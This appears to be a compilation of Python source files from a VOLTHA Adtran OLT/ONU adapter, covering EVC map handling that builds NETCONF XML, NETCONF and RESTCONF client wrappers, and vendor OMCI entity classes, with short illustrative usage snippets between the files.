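For reference, here is a hypothetical scenario entry (field values are illustrative, not taken from the real test data; the `fb` alias for the bbf_fiber protos comes from the test module's imports). Each dictionary key encodes `<object>-<action>` and the value supplies the RPC payload plus an empty protobuf that `ParseDict()` fills in before the POST:
```python
# Illustrative scenario item only; the real test data carries more fields per the proto.
example_item = {
    'cg-add': {
        'pb2': fb.ChannelgroupConfig(),   # empty message populated by ParseDict()
        'rpc': {
            'name': 'Manhattan'           # object name used in the REST path
        }
    }
}
# create_dynamic_method('cg-add', example_item['cg-add']) returns a method that, once
# attached to TestXPon (e.g. as test_003_cg-add), POSTs /api/v1/channel_groups/Manhattan
# and verifies the created entry against the request.
```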
#### File: adtran_olt/flow/evc_map.py
```python
import xmltodict
import re
import structlog
from enum import Enum
from twisted.internet.defer import inlineCallbacks, returnValue, succeed
log = structlog.get_logger()
# NOTE: For the EVC Map name, the ingress-port number is the VOLTHA port number (not the
#       pon-id), since it covers NNI ports as well in order to handle the NNI-NNI case.
#       For flows that cover an entire PON, the ONU ID and GEM ID are appended to the
#       name upon installation, separated by periods.
EVC_MAP_NAME_FORMAT = 'VOLTHA-{}-{}' # format(ingress-port, flow.id)
EVC_MAP_NAME_REGEX_ALL = 'VOLTHA-*'
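# Example (illustrative values only): a flow entering on VOLTHA port 21 with flow id 4097
# produces the map name 'VOLTHA-21-4097'; when installed for an entire PON, per-ONU/GEM
# entries such as 'VOLTHA-21-4097.1.2176' (ident 1, GEM 2176) are written to the hardware.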
class EVCMap(object):
"""
Class to wrap EVC functionality
"""
class EvcConnection(Enum):
NO_EVC_CONNECTION = 0
EVC = 1
DISCARD = 2
DEFAULT = NO_EVC_CONNECTION
@staticmethod
def xml(value):
# Note we do not have XML for 'EVC' enumeration.
if value is None:
value = EVCMap.EvcConnection.DEFAULT
            if value == EVCMap.EvcConnection.NO_EVC_CONNECTION:
                return '<no-evc-connection/>'
            elif value == EVCMap.EvcConnection.DISCARD:
                return '<discard/>'
raise ValueError('Invalid EvcConnection enumeration')
class PriorityOption(Enum):
INHERIT_PRIORITY = 0
EXPLICIT_PRIORITY = 1
DEFAULT = INHERIT_PRIORITY
@staticmethod
def xml(value):
if value is None:
value = EVCMap.PriorityOption.DEFAULT
if value == EVCMap.PriorityOption.INHERIT_PRIORITY:
return '<inherit-pri/>'
elif value == EVCMap.PriorityOption.EXPLICIT_PRIORITY:
return '<explicit-pri/>'
raise ValueError('Invalid PriorityOption enumeration')
def __init__(self, flow, evc, is_ingress_map):
self._flow = flow
self._evc = evc
self._gem_ids_and_vid = None # { key -> onu-id, value -> tuple(sorted GEM Port IDs, onu_vid) }
self._is_ingress_map = is_ingress_map
self._pon_id = None
self._installed = False
self._status_message = None
self._name = None
self._enabled = True
self._uni_port = None
self._evc_connection = EVCMap.EvcConnection.DEFAULT
self._evc_name = None
self._men_priority = EVCMap.PriorityOption.DEFAULT
self._men_pri = 0 # If Explicit Priority
self._c_tag = None
self._men_ctag_priority = EVCMap.PriorityOption.DEFAULT
self._men_ctag_pri = 0 # If Explicit Priority
self._match_ce_vlan_id = None
self._match_untagged = False
self._match_destination_mac_address = None
self._match_l2cp = False
self._match_broadcast = False
self._match_multicast = False
self._match_unicast = False
self._match_igmp = False
# ACL logic
self._eth_type = None
self._ip_protocol = None
self._ipv4_dst = None
self._udp_dst = None
self._udp_src = None
try:
self._valid = self._decode()
except Exception as e:
log.exception('decode', e=e)
self._valid = False
if self._valid:
evc.add_evc_map(self)
else:
self._evc = None
def __str__(self):
return "EVCMap-{}: UNI: {}, isACL: {}".format(self._name, self._uni_port,
self._needs_acl_support)
@staticmethod
def create_ingress_map(flow, evc):
return EVCMap(flow, evc, True)
@staticmethod
def create_egress_map(flow, evc):
return EVCMap(flow, evc, False)
@property
def valid(self):
return self._valid
@property
def installed(self):
return self._installed
@installed.setter
def installed(self, value):
assert not value, 'installed can only be reset' # Can only reset
self._installed = False
@property
def name(self):
return self._name
@property
def status(self):
return self._status_message
@status.setter
def status(self, value):
self._status_message = value
@property
def evc(self):
return self._evc
@property
def _needs_acl_support(self):
if self._ipv4_dst is not None: # In case MCAST downstream has ACL on it
return False
return self._eth_type is not None or self._ip_protocol is not None or\
self._udp_dst is not None or self._udp_src is not None
@property
def pon_id(self):
return self._pon_id # May be None
@property
def onu_ids(self):
return self._gem_ids_and_vid.keys()
@property
def gem_ids_and_vid(self):
return self._gem_ids_and_vid.copy()
@staticmethod
def _xml_header(operation=None):
return '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps"{}><evc-map>'.\
format('' if operation is None else ' xc:operation="{}"'.format(operation))
@staticmethod
def _xml_trailer():
return '</evc-map></evc-maps>'
def _common_install_xml(self):
xml = '<enabled>{}</enabled>'.format('true' if self._enabled else 'false')
xml += '<uni>{}</uni>'.format(self._uni_port)
if self._evc_name is not None:
xml += '<evc>{}</evc>'.format(self._evc_name)
else:
xml += EVCMap.EvcConnection.xml(self._evc_connection)
xml += '<match-untagged>{}</match-untagged>'.format('true'
if self._match_untagged
else 'false')
# if self._c_tag is not None:
# xml += '<ctag>{}</ctag>'.format(self._c_tag)
# TODO: The following is not yet supported (and in some cases, not decoded)
# self._men_priority = EVCMap.PriorityOption.INHERIT_PRIORITY
# self._men_pri = 0 # If Explicit Priority
#
# self._men_ctag_priority = EVCMap.PriorityOption.INHERIT_PRIORITY
# self._men_ctag_pri = 0 # If Explicit Priority
#
# self._match_ce_vlan_id = None
# self._match_untagged = True
# self._match_destination_mac_address = None
# self._eth_type = None
# self._ip_protocol = None
# self._ipv4_dst = None
# self._udp_dst = None
# self._udp_src = None
return xml
def _ingress_install_xml(self, onu_s_gem_ids_and_vid):
from ..onu import Onu
xml = '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps">'
for onu_or_vlan_id, gem_ids_and_vid in onu_s_gem_ids_and_vid.iteritems():
first_gem_id = True
vid = gem_ids_and_vid[1]
ident = '{}.{}'.format(self._pon_id, onu_or_vlan_id) if vid is None \
else onu_or_vlan_id
for gem_id in gem_ids_and_vid[0]:
xml += '<evc-map>'
xml += '<name>{}.{}.{}</name>'.format(self.name, ident, gem_id)
xml += '<ce-vlan-id>{}</ce-vlan-id>'.format(Onu.gem_id_to_gvid(gem_id))
# GEM-IDs are a sorted list (ascending). First gemport handles downstream traffic
if first_gem_id and vid is not None:
first_gem_id = False
xml += '<network-ingress-filter>'
xml += '<men-ctag>{}</men-ctag>'.format(vid) # Added in August 2017 model
xml += '</network-ingress-filter>'
xml += self._common_install_xml()
xml += '</evc-map>'
xml += '</evc-maps>'
return xml
def _egress_install_xml(self):
xml = EVCMap._xml_header()
xml += '<name>{}</name>'.format(self.name)
xml += self._common_install_xml()
xml += EVCMap._xml_trailer()
return xml
@inlineCallbacks
def install(self):
def gem_ports():
ports = []
for gems_and_vids in self._gem_ids_and_vid.itervalues():
ports.extend(gems_and_vids[0])
return ports
if self._valid and not self._installed and len(gem_ports()) > 0:
try:
# TODO: create generator of XML once we have MANY to install at once
map_xml = self._ingress_install_xml(self._gem_ids_and_vid) \
if self._is_ingress_map else self._egress_install_xml()
log.debug('install', xml=map_xml, name=self.name)
results = yield self._flow.handler.netconf_client.edit_config(map_xml)
self._installed = results.ok
self.status = '' if results.ok else results.error
except Exception as e:
log.exception('install', name=self.name, e=e)
raise
returnValue(self._installed and self._valid)
def _ingress_remove_xml(self, onus_gem_ids_and_vid):
xml = '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps"' + \
' xc:operation="delete">'
for onu_id, gem_ids_and_vid in onus_gem_ids_and_vid.iteritems():
for gem_id in gem_ids_and_vid[0]:
xml += '<evc-map>'
xml += '<name>{}.{}.{}</name>'.format(self.name, onu_id, gem_id)
xml += '</evc-map>'
xml += '</evc-maps>'
return xml
def _egress_remove_xml(self):
return EVCMap._xml_header('delete') + \
'<name>{}</name>'.format(self.name) + EVCMap._xml_trailer()
def remove(self):
if not self.installed:
returnValue('Not installed')
log.info('removing', evc_map=self)
def _success(rpc_reply):
log.debug('remove-success', rpc_reply=rpc_reply)
self._installed = False
def _failure(failure):
log.error('remove-failed', failure=failure)
self._installed = False
# TODO: create generator of XML once we have MANY to install at once
map_xml = self._ingress_remove_xml(self._gem_ids_and_vid) if self._is_ingress_map \
else self._egress_remove_xml()
d = self._flow.handler.netconf_client.edit_config(map_xml)
d.addCallbacks(_success, _failure)
return d
@inlineCallbacks
def delete(self):
"""
Remove from hardware and delete/clean-up EVC-MAP Object
"""
if self._evc is not None:
self._evc.remove_evc_map(self)
self._evc = None
self._flow = None
self._valid = False
try:
yield self.remove()
except Exception as e:
log.exception('removal', e=e)
returnValue('Done')
def reflow_needed(self):
log.debug('reflow-needed')
reflow = not self.installed
# TODO: implement
return reflow
@staticmethod
def create_evc_map_name(flow):
return EVC_MAP_NAME_FORMAT.format(flow.in_port, flow.flow_id)
def add_gem_port(self, gem_port, reflow=False):
# TODO: Refactor
if self._is_ingress_map:
def gem_ports():
ports = []
for gems_and_vids in self._gem_ids_and_vid.itervalues():
ports.extend(gems_and_vids[0])
return ports
before = gem_ports()
self._setup_gem_ids()
after = gem_ports()
if reflow or len(before) < len(after):
self._installed = False
return self.install()
return succeed('nop')
def remove_gem_port(self, gem_port):
# TODO: Refactor
if self._is_ingress_map:
def gem_ports():
ports = []
for gems_and_vids in self._gem_ids_and_vid.itervalues():
ports.extend(gems_and_vids[0])
return ports
before = gem_ports()
self._setup_gem_ids()
after = gem_ports()
if len(before) > len(after):
if len(after) == 0:
return self.remove()
else:
self._installed = False
return self.install()
return succeed('nop')
def _setup_gem_ids(self):
from flow_entry import FlowEntry
flow = self._flow # TODO: Drop saving of flow once debug complete
is_pon = flow.handler.is_pon_port(flow.in_port)
if self._is_ingress_map and is_pon:
pon_port = flow.handler.get_southbound_port(flow.in_port)
if pon_port is not None:
self._pon_id = pon_port.pon_id
self._gem_ids_and_vid = pon_port.gem_ids(flow.logical_port,
self._needs_acl_support,
flow.is_multicast_flow)
# TODO: Only EAPOL ACL support for the first demo - FIXED_ONU
if self._needs_acl_support and self._eth_type != FlowEntry.EtherType.EAPOL.value:
self._gem_ids_and_vid = dict()
def _decode(self):
from evc import EVC
from flow_entry import FlowEntry
flow = self._flow # TODO: Drop saving of flow once debug complete
self._name = EVCMap.create_evc_map_name(flow)
if self._evc:
self._evc_connection = EVCMap.EvcConnection.EVC
self._evc_name = self._evc.name
else:
self._status_message = 'Can only create EVC-MAP if EVC supplied'
return False
is_pon = flow.handler.is_pon_port(flow.in_port)
is_uni = flow.handler.is_uni_port(flow.in_port)
if is_pon or is_uni:
self._uni_port = flow.handler.get_port_name(flow.in_port)
self._evc.ce_vlan_preservation = False
else:
self._status_message = 'EVC-MAPS without UNI or PON ports are not supported'
return False # UNI Ports handled in the EVC Maps
# ACL logic
self._eth_type = flow.eth_type
if self._eth_type == FlowEntry.EtherType.IPv4.value:
self._ip_protocol = flow.ip_protocol
self._ipv4_dst = flow.ipv4_dst
if self._ip_protocol == FlowEntry.IpProtocol.UDP.value:
self._udp_dst = flow.udp_dst
self._udp_src = flow.udp_src
        # If there is no VLAN match, this may be untagged traffic or upstream traffic
        # that needs to match the gem-port VID
self._setup_gem_ids()
# self._match_untagged = flow.vlan_id is None and flow.inner_vid is None
self._c_tag = flow.inner_vid
# If a push of a single VLAN is present with a POP of the VLAN in the EVC's
# flow, then this is a traditional EVC flow
self._evc.men_to_uni_tag_manipulation = EVC.Men2UniManipulation.POP_OUT_TAG_ONLY
self._evc.switching_method = EVC.SwitchingMethod.DOUBLE_TAGGED
# if len(flow.push_vlan_id) == 1 and self._evc.flow_entry.pop_vlan == 1:
# self._evc.men_to_uni_tag_manipulation = EVC.Men2UniManipulation.SYMMETRIC
# self._evc.switching_method = EVC.SwitchingMethod.SINGLE_TAGGED
# self._evc.stpid = flow.push_vlan_tpid[0]
#
# elif len(flow.push_vlan_id) == 2 and self._evc.flow_entry.pop_vlan == 1:
# self._evc.men_to_uni_tag_manipulation = EVC.Men2UniManipulation.POP_OUT_TAG_ONLY
# self._evc.switching_method = EVC.SwitchingMethod.DOUBLE_TAGGED
# # self._match_ce_vlan_id = 'something maybe'
# raise NotImplementedError('TODO: Not supported/needed yet')
return True
# Bulk operations
@staticmethod
def remove_all(client, regex_=EVC_MAP_NAME_REGEX_ALL):
"""
Remove all matching EVC Maps from hardware
:param client: (ncclient) NETCONF Client to use
:param regex_: (String) Regular expression for name matching
:return: (deferred)
"""
        # Do a 'get' on the evc-map config and you should get the names
get_xml = """
<filter>
<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps">
<evc-map>
<name/>
</evc-map>
</evc-maps>
</filter>
"""
log.info('query', xml=get_xml, regex=regex_)
def request_failed(results, operation):
log.error('{}-failed'.format(operation), results=results)
# No further actions. Periodic poll later on will scrub any old EVC-Maps if needed
def delete_complete(results):
log.debug('delete-complete', results=results)
def do_delete(rpc_reply, regexpr):
log.debug('query-complete', rpc_reply=rpc_reply)
if rpc_reply.ok:
result_dict = xmltodict.parse(rpc_reply.data_xml)
entries = result_dict['data']['evc-maps'] if 'evc-maps' in result_dict['data'] else {}
if 'evc-map' in entries:
p = re.compile(regexpr)
if isinstance(entries['evc-map'], list):
names = {entry['name'] for entry in entries['evc-map']
if 'name' in entry and p.match(entry['name'])}
else:
names = set()
for item in entries['evc-map'].items():
if isinstance(item, tuple) and item[0] == 'name':
names.add(item[1])
break
if len(names) > 0:
del_xml = '<evc-maps xmlns="http://www.adtran.com/ns/yang/adtran-evc-maps"' + \
' xc:operation = "delete">'
for name in names:
del_xml += '<evc-map>'
del_xml += '<name>{}</name>'.format(name)
del_xml += '</evc-map>'
del_xml += '</evc-maps>'
log.debug('removing', xml=del_xml)
return client.edit_config(del_xml)
return succeed('no entries')
d = client.get(get_xml)
d.addCallbacks(do_delete, request_failed, callbackArgs=[regex_], errbackArgs=['get'])
d.addCallbacks(delete_complete, request_failed, errbackArgs=['edit-config'])
return d
```
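As a rough orientation, the sketch below shows how a flow handler might drive this class; `flow` and `evc` are placeholders for the objects normally produced by `flow_entry.py` and `evc.py`, and the NETCONF client is reached through `flow.handler`, so this is not the definitive call sequence:
```python
import structlog
from twisted.internet.defer import inlineCallbacks

log = structlog.get_logger()

@inlineCallbacks
def program_ingress_map(flow, evc):
    # 'flow' and 'evc' are placeholders; decoding of the flow happens in EVCMap.__init__.
    evc_map = EVCMap.create_ingress_map(flow, evc)
    if not evc_map.valid:
        log.error('evc-map-decode-failed', status=evc_map.status)
        return
    installed = yield evc_map.install()     # renders per-ONU/GEM XML and edit-configs it
    if not installed:
        log.error('evc-map-install-failed', status=evc_map.status)

# On adapter cleanup, every map created by VOLTHA can be scrubbed in one request:
#     d = EVCMap.remove_all(olt_handler.netconf_client)    # default regex 'VOLTHA-*'
```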
#### File: adtran_olt/net/adtran_netconf.py
```python
import structlog
from lxml import etree
from ncclient import manager
from ncclient.operations import RPCError
from ncclient.transport.errors import SSHError
from twisted.internet import defer, threads
from twisted.internet.defer import inlineCallbacks, returnValue
log = structlog.get_logger('ncclient')
ADTRAN_NS = 'http://www.adtran.com/ns/yang'
def adtran_module_url(module):
return '{}/{}'.format(ADTRAN_NS, module)
def phys_entities_rpc():
return """
<filter xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<physical-entities-state xmlns="{}">
<physical-entity/>
</physical-entities-state>
</filter>
""".format(adtran_module_url('adtran-physical-entities'))
class AdtranNetconfClient(object):
"""
Performs NETCONF requests
"""
def __init__(self, host_ip, port=830, username='', password='', timeout=10):
self._ip = host_ip
self._port = port
self._username = username
self._password = password
self._timeout = timeout
self._session = None
def __str__(self):
return "AdtranNetconfClient {}@{}:{}".format(self._username, self._ip, self._port)
@property
def capabilities(self):
"""
Get the server's NETCONF capabilities
:return: (ncclient.capabilities.Capabilities) object representing the server's capabilities.
"""
return self._session.server_capabilities if self._session else None
@property
def connected(self):
"""
Is this client connected to a NETCONF server
:return: (boolean) True if connected
"""
return self._session is not None and self._session.connected
def connect(self, connect_timeout=None):
"""
Connect to the NETCONF server
o To disable attempting publickey authentication altogether, call with
allow_agent and look_for_keys as False.
o hostkey_verify enables hostkey verification from ~/.ssh/known_hosts
:return: (deferred) Deferred request
"""
timeout = connect_timeout or self._timeout
return threads.deferToThread(self._do_connect, timeout)
def _do_connect(self, timeout):
try:
self._session = manager.connect(host=self._ip,
port=self._port,
username=self._username,
password=<PASSWORD>,
allow_agent=False,
look_for_keys=False,
hostkey_verify=False,
timeout=timeout)
except SSHError as e:
# Log and rethrow exception so any errBack is called
log.exception('SSHError-during-connect', e=e)
raise e
except Exception as e:
# Log and rethrow exception so any errBack is called
            log.exception('connect-failed', e=e)
raise e
# If debug logging is enabled, decrease the level, DEBUG is a significant
# performance hit during response XML decode
if log.isEnabledFor('DEBUG'):
log.setLevel('INFO')
        # TODO: ncclient also supports RaiseMode.NONE to limit exceptions. To set it, use:
        #
        #    self._session.raise_mode = RaiseMode.NONE
        #
        # and then, when you get a response back, you can check 'response.ok' to see if it is 'True';
        # if it is not, you can enumerate the 'response.errors' list for more information
return self._session
def close(self):
"""
Close the connection to the NETCONF server
:return: (deferred) Deferred request
"""
s, self._session = self._session, None
if s is None or not s.connected:
            return defer.succeed(True)
return threads.deferToThread(self._do_close, s)
def _do_close(self, old_session):
return old_session.close_session()
@inlineCallbacks
def _reconnect(self):
try:
yield self.close()
except:
pass
try:
yield self.connect()
except:
pass
def get_config(self, source='running'):
"""
Get the configuration from the specified source
:param source: (string) Configuration source, 'running', 'candidate', ...
:return: (deferred) Deferred request that wraps the GetReply class
"""
if not self._session:
            raise NotImplementedError('No SSH Session')
if not self._session.connected:
self._reconnect()
return threads.deferToThread(self._do_get_config, source)
def _do_get_config(self, source):
"""
Get the configuration from the specified source
:param source: (string) Configuration source, 'running', 'candidate', ...
:return: (GetReply) The configuration.
"""
return self._session.get_config(source)
def get(self, payload):
"""
Get the requested data from the server
:param payload: Payload/filter
:return: (deferred) for GetReply
"""
log.debug('get', filter=payload)
if not self._session:
            raise NotImplementedError('No SSH Session')
if not self._session.connected:
self._reconnect()
return threads.deferToThread(self._do_get, payload)
def _do_get(self, payload):
"""
Get the requested data from the server
:param payload: Payload/filter
:return: (GetReply) response
"""
try:
log.debug('get', payload=payload)
response = self._session.get(payload)
# To get XML, use response.xml
log.debug('response', response=response)
except RPCError as e:
log.exception('get', e=e)
raise
return response
def lock(self, source, lock_timeout):
"""
Lock the configuration system
:return: (deferred) for RpcReply
"""
log.info('lock', source=source, timeout=lock_timeout)
if not self._session or not self._session.connected:
            raise NotImplementedError('TODO: Support auto-connect if needed')
return threads.deferToThread(self._do_lock, source, lock_timeout)
def _do_lock(self, source, lock_timeout):
"""
Lock the configuration system
"""
try:
response = self._session.lock(source, timeout=lock_timeout)
# To get XML, use response.xml
except RPCError as e:
log.exception('lock', e=e)
raise
return response
def unlock(self, source):
"""
        Unlock the configuration system
        :param source: (string) Configuration datastore to unlock, 'running', 'candidate', ...
:return: (deferred) for RpcReply
"""
log.info('unlock', source=source)
if not self._session or not self._session.connected:
            raise NotImplementedError('TODO: Support auto-connect if needed')
return threads.deferToThread(self._do_unlock, source)
def _do_unlock(self, source):
"""
        Unlock the configuration system
"""
try:
response = self._session.unlock(source)
# To get XML, use response.xml
except RPCError as e:
log.exception('unlock', e=e)
raise
return response
@inlineCallbacks
def edit_config(self, config, target='running', default_operation='none',
test_option=None, error_option=None):
"""
Loads all or part of the specified config to the target configuration datastore with the ability to lock
the datastore during the edit.
:param config is the configuration, which must be rooted in the config element. It can be specified
either as a string or an Element.format="xml"
:param target is the name of the configuration datastore being edited
:param default_operation if specified must be one of { 'merge', 'replace', or 'none' }
:param test_option if specified must be one of { 'test_then_set', 'set' }
:param error_option if specified must be one of { 'stop-on-error', 'continue-on-error', 'rollback-on-error' }
The 'rollback-on-error' error_option depends on the :rollback-on-error capability.
:return: (deferred) for RpcReply
"""
if not self._session:
            raise NotImplementedError('No SSH Session')
if not self._session.connected:
try:
yield self._reconnect()
except Exception as e:
log.exception('edit-config-connect', e=e)
try:
if config[:7] != '<config':
config = '<config xmlns:xc="urn:ietf:params:xml:ns:netconf:base:1.0"' + \
' xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">' + \
config + '</config>'
rpc_reply = yield threads.deferToThread(self._do_edit_config, target,
config, default_operation,
test_option, error_option)
except Exception as e:
log.exception('edit_config', e=e)
raise
returnValue(rpc_reply)
def _do_edit_config(self, target, config, default_operation, test_option, error_option):
"""
Lock the configuration system
"""
try:
log.debug('edit-config', target=target, config=config)
response = self._session.edit_config(target=target, config=config
# TODO: Support additional options later
# ,default_operation=default_operation,
# test_option=test_option,
# error_option=error_option
)
log.debug('response', response=response)
# To get XML, use response.xml
# To check status, use response.ok (boolean)
except RPCError as e:
log.exception('do_edit_config', e=e)
raise
return response
def rpc(self, rpc_string):
"""
Custom RPC request
:param rpc_string: (string) RPC request
:return: (deferred) for GetReply
"""
log.debug('rpc', rpc=rpc_string)
if not self._session:
            raise NotImplementedError('No SSH Session')
if not self._session.connected:
self._reconnect()
return threads.deferToThread(self._do_rpc, rpc_string)
def _do_rpc(self, rpc_string):
try:
response = self._session.dispatch(etree.fromstring(rpc_string))
# To get XML, use response.xml
except RPCError as e:
log.exception('rpc', e=e)
raise
return response
```
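A minimal usage sketch follows; the address and credentials are placeholders, and the flow simply chains the Deferreds returned by the client's thread-backed operations:
```python
from twisted.internet.defer import inlineCallbacks, returnValue

@inlineCallbacks
def fetch_physical_entities(host_ip, username, password):
    # Placeholder credentials; each client call returns a Deferred because the blocking
    # ncclient operations are dispatched via threads.deferToThread().
    client = AdtranNetconfClient(host_ip, username=username, password=password)
    yield client.connect()
    reply = yield client.get(phys_entities_rpc())   # ncclient GetReply (XML in reply.data_xml)
    running = yield client.get_config('running')
    yield client.close()
    returnValue((reply, running))
```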
#### File: adtran_olt/net/adtran_rest.py
```python
import json
import structlog
import treq
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.internet.error import ConnectionClosed, ConnectionDone, ConnectionLost
log = structlog.get_logger()
class RestInvalidResponseCode(Exception):
def __init__(self, message, url, code):
super(RestInvalidResponseCode, self).__init__(message)
self.url = url
self.code = code
class AdtranRestClient(object):
"""
Performs Adtran RESTCONF requests
"""
# HTTP shortcuts
HELLO_URI = '/restconf/adtran-hello:hello'
REST_GET_REQUEST_HEADER = {'User-Agent': 'Adtran RESTConf',
'Accept': ['application/json']}
REST_POST_REQUEST_HEADER = {'User-Agent': 'Adtran RESTConf',
'Content-Type': 'application/json',
'Accept': ['application/json']}
REST_PATCH_REQUEST_HEADER = REST_POST_REQUEST_HEADER
REST_PUT_REQUEST_HEADER = REST_POST_REQUEST_HEADER
REST_DELETE_REQUEST_HEADER = REST_GET_REQUEST_HEADER
HTTP_OK = 200
HTTP_CREATED = 201
HTTP_ACCEPTED = 202
HTTP_NON_AUTHORITATIVE_INFORMATION = 203
HTTP_NO_CONTENT = 204
HTTP_RESET_CONTENT = 205
HTTP_PARTIAL_CONTENT = 206
_valid_methods = {'GET', 'POST', 'PATCH', 'DELETE'}
_valid_results = {'GET': [HTTP_OK, HTTP_NO_CONTENT],
'POST': [HTTP_OK, HTTP_CREATED, HTTP_NO_CONTENT],
'PUT': [HTTP_OK, HTTP_CREATED, HTTP_NO_CONTENT],
'PATCH': [HTTP_OK],
'DELETE': [HTTP_OK, HTTP_ACCEPTED, HTTP_NO_CONTENT]
}
for _method in _valid_methods:
assert _method in _valid_results # Make sure we have a results entry for each supported method
def __init__(self, host_ip, port, username='', password='', timeout=10):
"""
REST Client initialization
:param host_ip: (string) IP Address of Adtran Device
:param port: (int) Port number
:param username: (string) Username for credentials
:param password: (string) Password for credentials
:param timeout: (int) Number of seconds to wait for a response before timing out
"""
self._ip = host_ip
self._port = port
self._username = username
self._password = password
self._timeout = timeout
def __str__(self):
return "AdtranRestClient {}@{}:{}".format(self._username, self._ip, self._port)
@inlineCallbacks
def request(self, method, uri, data=None, name='', timeout=None, is_retry=False,
suppress_error=False):
"""
Send a REST request to the Adtran device
:param method: (string) HTTP method
:param uri: (string) fully URL to perform method on
:param data: (string) optional data for the request body
:param name: (string) optional name of the request, useful for logging purposes
:param timeout: (int) Number of seconds to wait for a response before timing out
:param is_retry: (boolean) True if this method called recursively in order to recover
from a connection loss. Can happen sometimes in debug sessions
and in the real world.
:return: (dict) On success with the proper results
"""
log.debug('request', method=method, uri=uri, data=data, retry=is_retry)
if method.upper() not in self._valid_methods:
raise NotImplementedError("REST method '{}' is not supported".format(method))
url = 'http://{}:{}{}{}'.format(self._ip, self._port,
'/' if uri[0] != '/' else '',
uri)
response = None
timeout = timeout or self._timeout
try:
if method.upper() == 'GET':
response = yield treq.get(url,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_GET_REQUEST_HEADER)
elif method.upper() == 'POST' or method.upper() == 'PUT':
response = yield treq.post(url,
data=data,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_POST_REQUEST_HEADER)
elif method.upper() == 'PATCH':
response = yield treq.patch(url,
data=data,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_PATCH_REQUEST_HEADER)
elif method.upper() == 'DELETE':
response = yield treq.delete(url,
auth=(self._username, self._password),
timeout=timeout,
headers=self.REST_DELETE_REQUEST_HEADER)
else:
raise NotImplementedError("REST method '{}' is not supported".format(method))
except NotImplementedError:
raise
except (ConnectionDone, ConnectionLost) as e:
if is_retry:
raise
            result = yield self.request(method, uri, data=data, name=name,
                                        timeout=timeout, is_retry=True)
            returnValue(result)
except ConnectionClosed:
returnValue(ConnectionClosed)
except Exception as e:
log.exception("rest-request", method=method, url=url, name=name, e=e)
raise
if response.code not in self._valid_results[method.upper()]:
message = "REST {} '{}' request to '{}' failed with status code {}".format(method, name,
url, response.code)
if not suppress_error:
log.error(message)
raise RestInvalidResponseCode(message, url, response.code)
if response.code == self.HTTP_NO_CONTENT:
returnValue(None)
else:
# TODO: May want to support multiple body encodings in the future
headers = response.headers
type_key = 'content-type'
type_val = 'application/json'
if not headers.hasHeader(type_key) or type_val not in headers.getRawHeaders(type_key, []):
raise Exception("REST {} '{}' request response from '{}' was not JSON",
method, name, url)
content = yield response.content()
try:
result = json.loads(content)
except Exception as e:
log.exception("json-decode", method=method, url=url, name=name,
content=content, e=e)
raise
returnValue(result)
```
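For completeness, a small sketch of how a handler might exercise this client (address, port and credentials are placeholders):
```python
import structlog
from twisted.internet.defer import inlineCallbacks, returnValue

log = structlog.get_logger()

@inlineCallbacks
def restconf_hello(host_ip, port, username, password):
    # Performs the RESTCONF 'hello' exchange; returns the decoded JSON body,
    # or None if the device answers 204 No Content.
    client = AdtranRestClient(host_ip, port, username=username, password=password)
    try:
        result = yield client.request('GET', AdtranRestClient.HELLO_URI, name='hello')
    except RestInvalidResponseCode as e:
        log.error('hello-failed', url=e.url, code=e.code)
        raise
    returnValue(result)
```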
#### File: adtran_onu/omci/omci_entities.py
```python
import inspect
import sys
from scapy.fields import ByteField, ShortField
from scapy.fields import IntField, StrFixedLenField
from voltha.extensions.omci.omci_entities import EntityClassAttribute, \
AttributeAccess, EntityOperations, EntityClass
# abbreviations
ECA = EntityClassAttribute
AA = AttributeAccess
OP = EntityOperations
class OntSystem(EntityClass):
class_id = 65300
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class VerizonOpenOMCI(EntityClass):
class_id = 65400
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class TwdmSystemProfile(EntityClass):
class_id = 65401
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class TwdmChannel(EntityClass):
class_id = 65402
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class WatchdogConfigData(EntityClass):
class_id = 65403
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get}
class FCPortalOrSraStat(EntityClass):
class_id = 65420
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Get, OP.Set, OP.Create, OP.Delete}
class Onu3gOrInvStat2(EntityClass):
class_id = 65422
attributes = [
ECA(ShortField("managed_entity_id", None), {AA.R, AA.SBC}),
]
mandatory_operations = {OP.Set, OP.Get, OP.Create, OP.Delete}
#################################################################################
# entity class lookup table from entity_class values
_onu_entity_classes_name_map = dict(
inspect.getmembers(sys.modules[__name__],
lambda o: inspect.isclass(o) and
issubclass(o, EntityClass) and
o is not EntityClass)
)
onu_custom_entity_classes = [c for c in _onu_entity_classes_name_map.itervalues()]
def add_onu_me_entities(new_me_classes):
from voltha.extensions.omci.omci_entities import entity_classes, entity_id_to_class_map
for entity_class in new_me_classes:
assert entity_class.class_id not in entity_id_to_class_map, \
"Class ID '{}' already exists in the class map".format(entity_class.class_id)
entity_id_to_class_map[entity_class.class_id] = entity_class
entity_classes.extend(new_me_classes)
```
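A short sketch of how an ONU adapter might register these vendor-specific MEs before decoding OMCI frames; the import path and call site are assumptions based on the file location above:
```python
# Assumed import path; adjust to wherever this module actually lives in the adapter.
from voltha.adapters.adtran_onu.omci.omci_entities import \
    add_onu_me_entities, onu_custom_entity_classes

def register_adtran_onu_mes():
    # Extends entity_classes / entity_id_to_class_map in voltha.extensions.omci.omci_entities
    # so that class IDs 65300-65422 decode into the classes defined above.
    add_onu_me_entities(onu_custom_entity_classes)
```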
#### File: adapters/adtran_onu/onu_gem_port.py
```python
import structlog
